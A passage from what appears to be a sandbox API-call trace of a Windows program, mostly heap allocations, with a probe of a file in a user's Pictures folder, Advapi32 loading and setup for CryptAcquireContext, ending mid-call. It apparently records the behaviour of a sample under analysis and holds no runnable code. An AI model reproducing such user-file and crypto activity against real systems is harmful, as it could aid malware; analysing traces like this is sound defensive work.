(HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0209.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0209.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0209.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0209.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0209.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0209.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0209.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0209.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0209.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0209.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0209.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0209.542] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0209.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0209.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0209.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0209.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0209.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0209.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0209.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0209.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0209.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0209.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0209.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0209.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0209.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0209.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0209.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0209.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0209.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0209.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0209.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0209.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0209.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0209.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0209.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0209.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0209.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0209.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0209.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0209.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0209.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0209.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0209.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0209.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0209.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0209.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0209.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0209.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0209.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0209.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0209.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0209.544] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0209.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0209.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0209.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0209.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0209.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0209.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0209.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0209.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0209.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0209.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0209.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0209.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0209.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0209.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0209.544] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0209.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0209.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0209.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0209.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0209.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0209.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0209.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0209.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0209.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0209.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0209.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0209.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0209.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0209.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0209.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0209.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0209.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0209.545] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/D7Vw ag.jpg", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37829d30, ftCreationTime.dwHighDateTime=0x1d5c96e, ftLastAccessTime.dwLowDateTime=0xff4560a0, ftLastAccessTime.dwHighDateTime=0x1d5d332, ftLastWriteTime.dwLowDateTime=0xff4560a0, ftLastWriteTime.dwHighDateTime=0x1d5d332, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0x0, dwReserved1=0x0, cFileName="D7Vw ag.jpg", cAlternateFileName="D7VWAG~1.JPG")) returned 0x9e1bf8 [0209.545] FindClose (in: hFindFile=0x9e1bf8 | out: hFindFile=0x9e1bf8) returned 1 [0209.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0209.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0209.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0209.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0209.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0209.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0209.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0209.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0209.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0209.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0209.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0209.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0209.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0209.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0209.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0209.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0209.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0209.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0209.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0209.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0209.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0209.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0209.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0209.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0209.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0209.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0209.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0209.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0209.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0209.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0209.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0209.547] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0209.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0209.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0209.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0209.547] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0209.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0209.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0209.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0209.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0209.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0209.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0209.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0209.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0209.548] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0209.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0209.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0209.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0209.548] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0209.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0209.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0209.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0209.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0209.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0209.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0209.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0209.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0209.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0209.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0209.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0209.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0209.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0209.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0209.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0209.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0209.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0209.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0209.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0209.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0209.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0209.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0209.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0209.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0209.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0209.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0209.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0209.549] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0209.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0209.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0209.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0209.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0209.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0209.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0209.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0209.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0209.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0209.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0209.549] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0209.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0209.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0209.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0209.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0209.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0209.550] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0209.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0209.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0209.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0209.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0209.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0209.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0209.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0209.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0209.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0209.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0209.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0209.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0209.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0209.550] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0209.550] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0209.550] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.550] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.550] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0209.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7040, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0209.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, 